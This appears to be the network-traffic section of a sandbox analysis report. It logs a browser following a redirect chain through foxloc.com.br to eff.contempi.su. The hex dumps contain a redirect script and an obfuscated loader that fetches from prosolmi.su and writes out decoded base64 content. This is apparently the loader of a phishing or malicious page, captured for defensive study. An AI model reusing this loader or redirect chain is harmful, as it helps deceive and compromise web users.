                                                                                                                                                                                                        Aug 15, 2024 15:39:06.273185968 CEST1.1.1.1192.168.2.40xfaabNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.273185968 CEST1.1.1.1192.168.2.40xfaabNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.273185968 CEST1.1.1.1192.168.2.40xfaabNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.273185968 CEST1.1.1.1192.168.2.40xfaabNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.273185968 CEST1.1.1.1192.168.2.40xfaabNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.273185968 CEST1.1.1.1192.168.2.40xfaabNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.902019024 CEST1.1.1.1192.168.2.40x8b2No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.902019024 CEST1.1.1.1192.168.2.40x8b2No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.902061939 CEST1.1.1.1192.168.2.40x67acNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.902061939 CEST1.1.1.1192.168.2.40x67acNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.902061939 CEST1.1.1.1192.168.2.40x67acNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.902061939 CEST1.1.1.1192.168.2.40x67acNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.902061939 CEST1.1.1.1192.168.2.40x67acNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.902061939 CEST1.1.1.1192.168.2.40x67acNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.902061939 CEST1.1.1.1192.168.2.40x67acNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:08.625360012 CEST1.1.1.1192.168.2.40xfcf4Name error (3)amazon.partners.tremorhub.comnonenone65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:08.625472069 CEST1.1.1.1192.168.2.40x30ddName error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:09.048105955 CEST1.1.1.1192.168.2.40xacabNo error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:09.048105955 CEST1.1.1.1192.168.2.40xacabNo error (0)aax-eu-retail-direct.amazon-adsystem.com52.95.119.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:09.049294949 CEST1.1.1.1192.168.2.40xb687No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:09.830130100 CEST1.1.1.1192.168.2.40x2324No error (0)unagi-eu.amazon.com67.220.226.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.449735216.58.206.514434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:46 UTC754OUTGET /xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/ HTTP/1.1
                                                                                                                                                                                                        Host: aeromexico.playable.video
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:46 UTC299INHTTP/1.1 302 Found
                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Location: https://foxloc.com.br/g63a/Gcgaming/423184/
                                                                                                                                                                                                        X-Cloud-Trace-Context: 77599dedb87e1b2da3cf4d8af3d121e1
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:46 GMT
                                                                                                                                                                                                        Server: Google Frontend
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        1192.168.2.449739108.167.132.1994434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:47 UTC677OUTGET /g63a/Gcgaming/423184/ HTTP/1.1
                                                                                                                                                                                                        Host: foxloc.com.br
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:48 UTC208INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:47 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        2024-08-15 13:37:48 UTC276INData Raw: 31 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 76 61 72 20 75 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2f 22 29 20 2b 20 31 3b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 75 62 73 74 72 69 6e 67 28 75 29 3b 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 2f 30 2f 69 6e 64 65 78 2e 78 6d 6c 22 20 2b 20 64 29 3b 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f
                                                                                                                                                                                                        Data Ascii: 108<!DOCTYPE html><html><head> <title></title></head><body> <script> var u = window.location.href.lastIndexOf("/") + 1; var d = window.location.href.substring(u); window.location.replace("/0/index.xml" + d); </script></


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        2192.168.2.449741108.167.132.1994434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:48 UTC708OUTGET /0/index.xml HTTP/1.1
                                                                                                                                                                                                        Host: foxloc.com.br
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                        Referer: https://foxloc.com.br/g63a/Gcgaming/423184/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:49 UTC260INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:48 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                        Last-Modified: Wed, 03 Jul 2024 16:06:22 GMT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Content-Length: 101
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Content-Type: application/xml
                                                                                                                                                                                                        2024-08-15 13:37:49 UTC101INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 3f 78 6d 6c 2d 73 74 79 6c 65 73 68 65 65 74 20 74 79 70 65 3d 22 74 65 78 74 2f 78 73 6c 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 78 73 6c 74 22 3f 3e 0d 0a 3c 72 6f 6f 74 2f 3e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="index.xslt"?><root/>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        3192.168.2.449742108.167.132.1994434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:50 UTC551OUTGET /0/index.xslt HTTP/1.1
                                                                                                                                                                                                        Host: foxloc.com.br
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                        Sec-Fetch-Dest: xslt
                                                                                                                                                                                                        Referer: https://foxloc.com.br/0/index.xml
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:50 UTC243INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:50 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                        Last-Modified: Wed, 14 Aug 2024 21:46:05 GMT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Content-Length: 1824
                                                                                                                                                                                                        Content-Type: application/xslt+xml
                                                                                                                                                                                                        2024-08-15 13:37:50 UTC1824INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 78 73 6c 3a 73 74 79 6c 65 73 68 65 65 74 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 78 73 6c 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 58 53 4c 2f 54 72 61 6e 73 66 6f 72 6d 22 3e 0d 0a 20 20 20 20 3c 78 73 6c 3a 74 65 6d 70 6c 61 74 65 20 6d 61 74 63 68 3d 22 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <html lang="en"> <head> <meta charset="UTF-8"/> <


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        4192.168.2.449743184.28.90.27443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:50 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                        2024-08-15 13:37:50 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                        Server: ECAcc (paa/6F76)
                                                                                                                                                                                                        X-CID: 11
                                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                        X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                        Cache-Control: public, max-age=75503
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:50 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        X-CID: 2


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        5192.168.2.449745108.167.132.1994434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:50 UTC593OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                        Host: foxloc.com.br
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://foxloc.com.br/0/index.xml
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:51 UTC176INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:50 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        6192.168.2.449746184.28.90.27443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:51 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                        Range: bytes=0-2147483646
                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                        2024-08-15 13:37:51 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                        ApiVersion: Distribute 1.1
                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                        Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                        X-CID: 11
                                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                        X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                        Cache-Control: public, max-age=97612
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:51 GMT
                                                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        X-CID: 2
                                                                                                                                                                                                        2024-08-15 13:37:51 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        7192.168.2.449747172.67.144.374434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:52 UTC686OUTGET /DJuy2C6F/ HTTP/1.1
                                                                                                                                                                                                        Host: eff.contempi.su
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                        Referer: https://foxloc.com.br/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1005INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:53 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: no-cache, private
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4V2OoYDydH70dvxFIsJf4s2GFTvlhev1jtM6OzE9GM52TdgNxuYADctTjJL552I%2BxrrjnXqsT%2FFMY9vPKlL6uO5nabjbxWxPb7bx%2FehS0ZrbvTg5OF2DEU5EI01mgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6IlZKbTZDWG1iU1pZSEg0UDBsMUcwclE9PSIsInZhbHVlIjoibGxlenh6RE9VbldaVllOamUwK3dPaExuMVBFbU9wVDBOZWpVRy80aVhWMjMyU3lxMEhlZmFaSGZ5R0crcm9MVWFOZWdpSzdyV0N6eUVNRmdweUc1UGNLeDk2a3hQaHFDOHFhOXd5YzNJbjUwSktuWUNmd2Fha21RaVdjSlFKeFAiLCJtYWMiOiIyNWFiYTA4MmQ5MjM2YjJjYWEyY2RhYWE3YzMwMDZiZGVmZGIxZmFiZWM4MzcyMTJmNTBkM2U0MTRiYmEyZDI1IiwidGFnIjoiIn0%3D; expires=Thu, 15-Aug-2024 15:37:53 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 35 49 4f 54 42 7a 4b 79 74 30 5a 6d 4a 50 64 6b 39 59 61 54 4a 71 61 44 56 31 4d 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 52 7a 4e 33 61 6c 5a 77 61 45 4e 52 51 6a 4d 79 53 31 5a 76 61 54 5a 6c 4e 48 4a 47 55 46 70 57 4f 57 78 71 4d 47 38 79 63 58 67 79 64 30 39 42 65 6b 30 72 64 33 70 6f 51 31 4e 42 53 33 59 34 55 6c 64 73 59 56 42 7a 56 6d 5a 4a 4b 31 4a 78 57 56 70 36 62 6a 4d 76 62 46 49 77 54 57 6c 7a 63 6c 46 44 53 56 52 4c 4e 58 4a 53 4d 33 4e 79 55 45 56 70 64 7a 68 55 51 54 5a 70 62 58 42 6b 54 6a 46 73 4d 79 39 42 5a 33 41 72 52 32 56 43 61 57 5a 46 5a 56 46 70 63 46 6f 77 4c 7a 52 4d 4c 30 30 78 55 6a 52 57 4d 56 63
                                                                                                                                                                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Im5IOTBzKyt0ZmJPdk9YaTJqaDV1MFE9PSIsInZhbHVlIjoiRzN3alZwaENRQjMyS1ZvaTZlNHJGUFpWOWxqMG8ycXgyd09Bek0rd3poQ1NBS3Y4UldsYVBzVmZJK1JxWVp6bjMvbFIwTWlzclFDSVRLNXJSM3NyUEVpdzhUQTZpbXBkTjFsMy9BZ3ArR2VCaWZFZVFpcFowLzRML00xUjRWMVc
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1369INData Raw: 32 66 33 35 0d 0a 3c 73 63 72 69 70 74 3e 66 65 74 63 68 28 27 68 74 74 70 73 3a 2f 2f 59 47 42 5a 2e 70 72 6f 73 6f 6c 6d 69 2e 73 75 2f 62 69 6d 66 66 6a 72 71 64 79 71 71 79 77 6f 74 6d 67 75 6b 78 6b 6e 46 72 6c 61 4c 56 44 49 53 4e 5a 4a 50 4b 43 45 4a 45 5a 51 56 4e 4f 45 4f 55 41 56 58 45 4a 4a 4a 4b 43 4a 58 4b 44 4a 4a 41 27 2c 20 7b 0d 0a 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0d 0a 7d 29 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 7b 0d 0a 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 28 29 0d 0a 7d 29 2e 74 68 65 6e 28 74 65 78 74 20 3d 3e 20 7b 0d 0a 69 66 28 74 65 78 74 20 3d 3d 20 30 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65
                                                                                                                                                                                                        Data Ascii: 2f35<script>fetch('https://YGBZ.prosolmi.su/bimffjrqdyqqywotmgukxknFrlaLVDISNZJPKCEJEZQVNOEOUAVXEJJJKCJXKDJJA', {method: "GET",}).then(response => {return response.text()}).then(text => {if(text == 0){document.write(decodeURIComponent(escape
                                                                                                                                                                                                        2024-08-15 13:37:53 UTC1369INData Raw: 70 65 6d 55 36 4d 53 34 31 63 6d 56 74 4f 33 30 4e 43 6e 30 4e 43 69 4e 50 52 56 56 5a 52 6b 4e 53 64 31 68 51 49 48 42 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 77 4f 32 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 4d 58 4a 6c 62 54 74 39 44 51 6f 6a 54 30 56 56 57 55 5a 44 55 6e 64 59 55 43 35 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4e 54 42 77 65 44 74 79 61 57 64 6f 64 44 6f 67 4e 7a 4a 77 65 44 74 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 74 77 59 57 52 6b 61 57 35 6e 4c 58 4a 70 5a 32 68 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 77 59 57 52 6b 61 57 35 6e 4c 57
                                                                                                                                                                                                        Data Ascii: pemU6MS41cmVtO30NCn0NCiNPRVVZRkNSd1hQIHB7bWFyZ2luLXRvcDowO21hcmdpbi1ib3R0b206MXJlbTt9DQojT0VVWUZDUndYUC5jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNTBweDtyaWdodDogNzJweDt3aWR0aDogMTAwJTtwYWRkaW5nLXJpZ2h0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTtwYWRkaW5nLW
